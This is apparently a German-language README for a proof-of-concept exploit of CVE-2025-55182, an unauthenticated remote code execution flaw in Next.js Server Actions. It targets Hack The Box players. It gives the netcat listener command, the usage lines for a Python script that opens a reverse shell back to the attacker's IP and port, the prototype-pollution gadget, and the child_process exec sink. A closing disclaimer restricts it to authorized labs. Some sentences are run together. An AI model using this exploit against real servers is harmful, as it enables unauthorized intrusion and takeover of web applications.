
Ich weiß, du bist wahrscheinlich wegen Hack the Box hier – falls ja, ja, dieses hier funktioniert tatsächlich.
Ein Proof-of-Concept-Exploit (PoC) für CVE-2025-55182, der eine nicht authentifizierte Remote-Code-Execution-Schwachstelle (RCE) in Next.js Server Actions angreift.
Dieser Exploit missbraucht Prototype Pollution während der Deserialisierung von React-Server-Components- (RSC) Multipart-Payloads, um mithilfe eines asynchronen, nicht blockierenden Ausführungsablaufs bösartige Befehle in den Node.js-Prozess einzuschleusen.
child_process.exec() anstelle von blockierenden execSync()-APIs, um Thread-Hänger auf Container-Knoten zu verhindern.requests-Bibliothek erstellt.Öffnen Sie ein Terminal auf Ihrem angreifenden Host und starten Sie einen Netcat-Socket-Listener, um die eingehende Reverse-Verbindung zu empfangen:
nc -lvnp 4444
Geben Sie die Ziel-Basis-URL, Ihre lokale Host-Interface-IP und Ihren gewünschten Listener-Port an:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
Das Skript sendet eine manipulierte rohe Multipart-Payload direkt an den Anwendungs-Routing-Endpunkt mit dem erforderlichen Next-Action-Routing-Header.
Durch die Nutzung von Objektkonstruktions-Signaturen über {"get":"$1:constructor:constructor"} verschmutzt die Deserialisierungs-Engine den nativen Objektbaum. Bei der Verarbeitung der begleitenden Parameter interpretiert sie den bösartig eingebetteten _response-Kontextblock als Befehls-Warteschlange, wodurch eine Codeausführung unter den Berechtigungen des laufenden Node-Server-Benutzerkontexts ermöglicht wird.
// Zugrunde liegendes Vektorziel:
process.mainModule.require('child_process').exec('your_payload_here');
Dieses Skript wurde ausschließlich für Bildungszwecke, autorisierte Sicherheitstests und das Erfassen verwundbarer Flags in Laboren wie Hack The Box erstellt. Der Autor ist nicht verantwortlich für Missbrauch, unbefugte Systemeindringlinge oder Schäden, die durch dieses Werkzeug verursacht werden.